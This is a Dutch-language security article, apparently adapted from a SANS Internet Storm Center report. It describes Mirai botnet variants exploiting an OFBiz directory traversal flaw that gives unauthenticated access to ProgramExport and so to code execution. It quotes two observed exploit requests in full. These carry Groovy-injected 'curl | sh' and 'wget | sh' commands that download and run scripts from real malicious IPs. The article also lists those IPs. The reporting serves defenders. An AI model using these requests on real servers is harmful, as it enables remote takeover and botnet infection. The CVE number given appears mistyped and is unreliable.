Mirai Botnet richt zich op OFBiz-servers die kwetsbaar zijn voor directorytraversal

Enterprise Resource Planning (ERP)-software is de kern van veel ondernemende ondersteunende personeelszaken, boekhouding, verzending en productie. Deze systemen kunnen zeer complex en moeilijk te onderhouden worden. Ze zijn vaak zeer op maat gemaakt, wat het patchen lastig kan maken. Kritieke kwetsbaarheden blijven echter deze systemen beïnvloeden en brengen kritieke bedrijfsgegevens in gevaar.

Het SANS Internet Storm Center heeft een rapport gepubliceerd waaruit blijkt dat het open-source ERP-framework OFBiz momenteel het doelwit is van nieuwe varianten van het Mirai-botnet.

Als onderdeel van haar uitgebreide projectportfolio ondersteunt de Apache Foundation OFBiz, een Java-gebaseerd framework voor het maken van ERP-applicaties (Enterprise Resource Planning). OFBiz lijkt veel minder gangbaar te zijn dan commerciële alternatieven. Echter, net als bij elk ander ERP-systeem, vertrouwen organisaties erop voor gevoelige bedrijfsgegevens, en de beveiliging van deze ERP-systemen is cruciaal.

In mei dit jaar werd een kritieke beveiligingsupdate uitgebracht voor OFBiz. De update loste een directory traversal-kwetsbaarheid op die kon leiden tot uitvoering van externe opdrachten. OFBiz-versies vóór 18.12.13 werden getroffen. Een paar weken later werden details over de kwetsbaarheid openbaar gemaakt.

Directory traversal, of path traversal, kwetsbaarheden kunnen worden gebruikt om toegangscontrole regels te omzeilen. Bijvoorbeeld, als een gebruiker toegang heeft tot een “/public” directory maar niet tot een “/admin” directory, kan een aanvaller een URL gebruiken zoals “/public/../admin” om de toegangscontrole logica te misleiden. Onlangs hebben CISA en FBI een waarschuwing vrijgegeven als onderdeel van het “Secure by Design” initiatief, gericht op directory traversal. CISA wees erop dat ze momenteel 55 directory traversal kwetsbaarheden bijhouden als onderdeel van de “Known Exploited Vulnerabilities” (KEV) catalogus.

Voor OFBiz wordt de directory traversal eenvoudig geactiveerd door een puntkomma in te voegen. Het enige dat een aanvaller hoeft te doen, is een URL vinden waar hij toegang toe heeft en een puntkomma toevoegen, gevolgd door een beperkte URL. De exploit-URL die we momenteel zien, is:

/webtools/control/forgotPassword;/ProgramExport

Omdat gebruikers wachtwoorden moeten kunnen resetten zonder eerst in te loggen, vereist “forgotPassword” geen authenticatie. “ProgramExport” daarentegen moet toegangsgecontroleerd zijn en niet bereikbaar tenzij de gebruiker is ingelogd. “ProgramExport” is met name gevaarlijk omdat het willekeurige code-uitvoering toestaat. Foutieve logica in OFBiz stopte met het evalueren van de URL bij de puntkomma. Hierdoor kon elke gebruiker, zonder in te loggen, toegang krijgen tot het tweede deel van de URL, “/ProgramExport.”

Een aanvaller moet een POST-aanvraag gebruiken om de kwetsbaarheid te exploiteren, maar heeft niet per se een aanvraagbody nodig. In plaats daarvan werkt een URL-parameter prima.

Het SANS Internet Storm Center gebruikt een uitgebreid netwerk van honeypots om pogingen te detecteren om een ​​breed scala aan kwetsbaarheden in webapplicaties te exploiteren. Belangrijke nieuwe exploitpogingen worden samengevat in een “First Seen”-rapport. Dit weekend detecteerden deze sensoren een significante toename in pogingen om CVE-2024-32213 te exploiteren, de hierboven genoemde directory traversal-kwetsbaarheid van OFBiz, die onmiddellijk werd opgepikt door het “First Seen”-rapport.

De exploitpogingen waren afkomstig van twee verschillende IP-adressen die ook gekoppeld waren aan verschillende pogingen om IoT-apparaten te exploiteren, die doorgaans worden geassocieerd met huidige varianten van het ‘Mirai’-botnet.

De misdadigers gebruikten twee smaken van de exploit. De eerste gebruikte de URL om het commando op te nemen dat de exploit moest uitvoeren:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh

De tweede gebruikte de body van het verzoek voor de opdracht, wat gebruikelijker is voor “POST”-verzoeken:

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (victim IP address)
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);

Helaas werden noch het “bin.sh” noch het “sh” script hersteld. De IP-adressen waren betrokken bij scans op 29 juli, met behulp van de user agent “KrebsOnSecurity”, een pluim op de hoed voor infosec blogger Brian Krebs. De gescande URL’s waren echter voornamelijk parasitair, op zoek naar bestaande web shells die waren achtergelaten door eerdere aanvallen. Het IP-adres werd ook gebruikt om een ​​bestand te verspreiden met de naam “botx.arm”. Deze bestandsnaam wordt vaak geassocieerd met Mirai-varianten.

Met de kwetsbaarheidsaankondiging in mei hebben we gewacht op een aantal scans om te profiteren van de OFBiz-kwetsbaarheid. Exploitatie was triviaal en hoewel de kwetsbare en blootgestelde populatie klein is, heeft dit aanvallers in het verleden niet tegengehouden. Maar ze experimenteren nu ten minste en voegen de kwetsbaarheid misschien toe aan bots zoals Mirai-varianten.

Er zijn slechts een paar IP’s bij betrokken:

  • 95.214.27.196: Exploit verzenden als URL-parameter en malware hosten.
  • 83.222.191.62: Exploit verzenden als aanvraagbody. Malware gehost op 185.196.10.231. Eerder in juli werd dit IP gescand op IoT-kwetsbaarheden.
  • 185.196.10.231: malware hosten

Als u dit artikel interessant vond en meer wilt weten over de wereld van het beveiligen van webapplicaties, API’s en microservices, kunt u mij bezoeken op Network Security 2024 (4-9 september) voor mijn cursus SEC522. Bekijk hier wat er allemaal te doen is tijdens het evenement.

Thijs Van der Does